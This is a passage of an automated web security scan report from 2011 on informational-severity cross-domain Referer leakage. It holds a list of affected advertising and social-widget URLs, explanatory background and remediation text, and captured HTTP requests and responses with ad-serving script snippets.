http://a.fsdn.com/con/js/min/sf.js
http://a.netmng.com/hic/
http://a.netmng.com/hic/
http://a.rad.msn.com/ADSAdClient31.dll
http://a.rad.msn.com/ADSAdClient31.dll
http://a.rad.msn.com/ADSAdClient31.dll
http://a.tribalfusion.com/j.ad
http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3
http://ad.doubleclick.net/adi/N1558.NetMining/B4820225
http://ad.doubleclick.net/adi/N1558.NetMining/B4820225.2
http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3
http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3
http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16
http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17
http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel
http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story
http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story
http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story
http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story
http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18
http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911
http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911
http://ad.doubleclick.net/adj/interactive.wsj.com/markets_story
http://ad.doubleclick.net/adj/lfs2.lifescript/conditions
http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr
http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr
http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text
http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec
http://ad.doubleclick.net/adj/scmag.hmktus/sc
http://ad.doubleclick.net/adj/scmag.hmktus/sc
http://ad.doubleclick.net/adj/scmag.hmktus/sc
http://ad.yieldmanager.com/pixel
http://ads.pointroll.com/PortalServe/
http://ads.pointroll.com/PortalServe/
http://ads.pointroll.com/PortalServe/
http://adserver.adtechus.com/addyn/3.0/5259.1/1248404/0/225/ADTECH
http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
http://assets.mybcdna.com/JavaScript/apps/site.js
http://assets.tumblr.com/iframe.html
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
https://code.google.com/p/domsnitch/downloads/detail
http://consultants-locator.apple.com/index.php
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://d.101m3.com/afr.php
http://d.101m3.com/afr.php
http://d.101m3.com/afr.php
http://dg.specificclick.net/
http://dinclinx.com/
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://greatponds.squarespace.com/universal/scripts/global.js
http://hipservice.live.com/gethip.srf
http://home.live.com/search
http://home.live.com/search/hip
http://ib.adnxs.com/if
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js
http://maps.google.com/maps
http://media.fastclick.net/w/get.media
http://mediacdn.disqus.com/1311185431/build/system/disqus.js
http://mediacdn.disqus.com/1311376479/build/system/disqus.js
http://my.seashepherd.org/NetCommunity/Page.aspx
http://oascentral.discovery.com/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70
https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx
http://pixel.everesttech.net/2368/gr
http://pixel.invitemedia.com/admeld_sync
http://platform0.twitter.com/widgets/follow_button.html
http://player.vimeo.com/video/18305022
http://player.vimeo.com/video/25752549
http://player.vimeo.com/video/26341323
http://player.vimeo.com/video/8022406
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rd.apmebf.com/w/get.media
http://scmagazineus.disqus.com/combination_widget.js
http://showadsak.pubmatic.com/AdServer/AdServerServlet
http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css
http://social.msdn.microsoft.com/Search/en-US
http://social.msdn.microsoft.com/Search/en-US
http://social.msdn.microsoft.com/Search/en-US
http://social.msdn.microsoft.com/Search/en-US/en-USebb6e
http://social.msdn.microsoft.com/search/en-US
http://static.curse.com/themes/common/v6/scripts/core.js
http://syndication.jobthread.com/jt/syndication/page.php
http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220
http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula
http://visualstudiogallery.msdn.microsoft.com/site/search
http://visualstudiogallery.msdn.microsoft.com/site/search
http://widgets.klout.com/
http://www.bing.com/search
http://www.boston.com/dynamicassembly/sitepath54/js_output.js
http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/
http://www.capitalone.com/directbanking/
http://www.datacard.com/combined.js
http://www.facebook.com/connect/connect.php
http://www.facebook.com/connect/connect.php
http://www.facebook.com/connect/connect.php
http://www.facebook.com/connect/connect.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/fan.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.greatpondsma.org/universal/scripts/global.js
http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx
http://www.lifescript.com/adcontrol.htm
http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx
http://www.microsoft.com/en-us/homepage/Components/Grid/Home.asch
http://www.microsoft.com/en-us/homepage/Components/Grid/Work-Business.asch
http://www.microsoft.com/en-us/security_essentials/Search.aspx
http://www.microsoft.com/en-us/security_essentials/default.aspx
http://www.myyearbook.com/advertising/default.php
http://www.nmmlaw.com/index.php
http://www.paloaltonetworks.com/cam/switch/index.php
http://www.scmagazineus.com/js/scripts.js
http://www.silverlight.net/silverlight-adchain.html
http://www.silverlight.net/silverlight-adchain.html
http://www.treehugger.com/galleries/
http://www.treehugger.com/science_technology/
http://www.treehugger.com/travel_nature/
http://www.youtube.com/embed/6hCRafyV0zI
http://www.youtube.com/embed/pDXWOjC-AlA

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

18.1. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/cm.yearbook/ford_ron_071911

Issue detail

The page was loaded from a URL containing a query string:

http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/?

The response contains the following link to another domain:

http://c.betrad.com/a/4.gif

Request

GET /cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:51 GMT
Content-Length: 8442
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:51 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:51 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:51 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:51 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
ev.ib-ibi.com/image.sbix?go=2223&pid=15",false);var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:250,
ad_w:300,
uqid:bap_rnd,
cps:'bz'
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>');
(function() {
if(document.getElementById('ba.js')) return;
document.write('<sc'+'ript id="ba.js" type="text/javascript" src="http://c.betrad.com/geo/ba.js">
...[SNIP]...

18.2. http://a.fsdn.com/con/css/sf.min.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.fsdn.com
Path:	/con/css/sf.min.css

Issue detail

The page was loaded from a URL containing a query string:

http://a.fsdn.com/con/css/sf.min.css?1256826599

The response contains the following links to other domains:

http://fedoraproject.org/
http://nginx.net/

Request

GET /con/css/sf.min.css?1256826599 HTTP/1.1
Host: a.fsdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hoytllc-vcloud.svn.sourceforge.net/

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Content-Type: text/html
Content-Length: 3653
Cache-Control: public, max-age=1209600
Expires: Sat, 06 Aug 2011 04:42:35 GMT
Date: Sat, 23 Jul 2011 04:42:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>The page is not f
...[SNIP]...
<div class="logos">
<a href="http://nginx.net/"><img
src="nginx-logo.png"
alt="[ Powered by nginx ]"
width="121" height="32" /></a>

<a href="http://fedoraproject.org/"><img
src="poweredby.png"
alt="[ Powered by Fedora EPEL ]"
width="88" height="31" />
...[SNIP]...

18.3. http://a.fsdn.com/con/js/min/sf.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.fsdn.com
Path:	/con/js/min/sf.js

Issue detail

The page was loaded from a URL containing a query string:

http://a.fsdn.com/con/js/min/sf.js?1311259746

The response contains the following links to other domains:

http://p.sf.net/sourceforge/privacy
http://p.sf.net/sourceforge/terms
http://sourceforge.net/apps/trac/sitelegal/wiki/Terms_of_Use
https://sourceforge.net/apps/trac/sourceforge/wiki/Release%20files%20for%20download

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Content-Type: application/x-javascript
Last-Modified: Thu, 21 Jul 2011 13:48:15 GMT
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 335086
Cache-Control: public, max-age=1073283
Expires: Thu, 04 Aug 2011 14:50:18 GMT
Date: Sat, 23 Jul 2011 04:42:15 GMT
Connection: close

(function($){$.extend({metadata:{defaults:{type:"class",name:"metadata",cre:/({.*})/,single:"metadata"},setType:function(type,name){this.defaults.type=type;this.defaults.name=name},get:function(elem,o
...[SNIP]...
<br>':"",'You may upload files up to 1GB in size using the web form. For larger files, <a href="https://sourceforge.net/apps/trac/sourceforge/wiki/Release%20files%20for%20download#SCP">use FTP, SCP, or rsync</a>
...[SNIP]...
<br>','Only <a href="http://sourceforge.net/apps/trac/sitelegal/wiki/Terms_of_Use#CodeLicensesGrantedtoGeeknetandOtherUsers">Open Source-licensed</a>
...[SNIP]...
<br>','When uploading files, you agree to abide by our <a href="http://p.sf.net/sourceforge/terms">Terms of Service</a> and <a href="http://p.sf.net/sourceforge/privacy">Privacy Policy</a>
...[SNIP]...

18.4. http://a.netmng.com/hic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The page was loaded from a URL containing a query string:

http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737279386215001%26l%3D908365%26ad%3D96041%26s%3D917259%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N1558.NetMining/B4616765.3;sz=728x90;ord=1311271278;click=http://lm.trafficmp.com/clicksense/click?t=3552737279386215001&l=908365&ad=96041&s=917259&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443;?
http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3;sz=728x90;ord=1311271278;click=http://lm.trafficmp.com/clicksense/click?t=3552737279386215001&l=908365&ad=96041&s=917259&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443;?
http://ad.doubleclick.net/adj/N1558.NetMining/B4616765.3;sz=728x90;ord=1311271278;click=http://lm.trafficmp.com/clicksense/click?t=3552737279386215001&l=908365&ad=96041&s=917259&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443;?
http://ad.doubleclick.net/jump/N1558.NetMining/B4616765.3;sz=728x90;ord=1311271278;click=http://lm.trafficmp.com/clicksense/click?t=3552737279386215001&l=908365&ad=96041&s=917259&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443;?

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737279386215001%26l%3D908365%26ad%3D96041%26s%3D917259%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443 HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=Pubmatic&section=None&size=728x90&site=MYB
Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:18 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Tue, 19 Jul 2011 18:01:18 GMT
Last-Modified: Tue, 19 Jul 2011 18:01:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=JLLF4eT1WhcY7TzYRhauNik%2BFECnwub8U63nHW2DWuRU9TJfs%2By9kW8RBADWjyrHn3YHU%2Flp4WOWxHVxr8YttbkMofJyaMuGzAgYgcg%2BAJA2ZoK8tMT87Be%2BOn0y2IP8; expires=Fri, 20-Jan-2012 18:01:18 GMT; path=/
Set-Cookie: evo5_display=G6MLdCM9CI2rJlKTKKHeJTbB%2BD1BgdUO3rNqq8QIwPMuINcgAs%2Fyl2LBJC3g%2Bm1N5RS85yGfnXHVu0L8BESppA%3D%3D; expires=Sat, 25-Jun-44591 18:01:18 GMT; path=/; domain=.netmng.com
Content-Length: 1605
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3;sz=728x90;ord=1311271278;click=http://lm.trafficmp.com/clicksense/click?t=3552737279386215001&l=908365&ad=96041&s=917259&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443;?"WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000"><SCRIPT language="JavaScript1.1"SRC="http://ad.doubleclick.net/adj/N1558.NetMining/B4616765.3;sz=728x90;ord=1311271278;click=http://lm.trafficmp.com/clicksense/click?t=3552737279386215001&l=908365&ad=96041&s=917259&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443;?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N1558.NetMining/B4616765.3;sz=728x90;ord=1311271278;click=http://lm.trafficmp.com/clicksense/click?t=3552737279386215001&l=908365&ad=96041&s=917259&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443;?"><IMG SRC="http://ad.doubleclick.net/ad/N1558.NetMining/B4616765.3;sz=728x90;ord=1311271278;click=http://lm.trafficmp.com/clicksense/click?t=3552737279386215001&l=908365&ad=96041&s=917259&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443;?"BORDER=0 WIDTH=728 HEIGHT=90 ALT="Click Here"></A>
...[SNIP]...

18.5. http://a.netmng.com/hic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The page was loaded from a URL containing a query string:

http://a.netmng.com/hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271277;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443;?
http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271277;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443;?
http://ad.doubleclick.net/adj/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271277;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443;?
http://ad.doubleclick.net/jump/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271277;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443;?

Request

GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443 HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:17 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Tue, 19 Jul 2011 18:01:17 GMT
Last-Modified: Tue, 19 Jul 2011 18:01:17 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=JLLF4eT1WhcY7TzYRhauNik%2BFECnwub8U63nHW2DWuT52nEybE7VWU6MyBF%2BwKSbZMx03f%2Fw0xF0izK%2B%2Fg6d%2Bw%3D%3D; expires=Fri, 20-Jan-2012 18:01:17 GMT; path=/
Set-Cookie: evo5_display=hKn31hJ9q24SwrCsKVHtvYupVI9QLFINGjr%2BmRr8YLXwAyLdvUmC2N2XsEzoQNrOmFE38RQRoG368kINn%2FWgDA%3D%3D; expires=Sat, 25-Jun-44591 18:01:17 GMT; path=/; domain=.netmng.com
Content-Length: 1607
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271277;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443;?"WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000"><SCRIPT language="JavaScript1.1"SRC="http://ad.doubleclick.net/adj/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271277;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443;?"></SCRIPT><NOSCRIPT><A 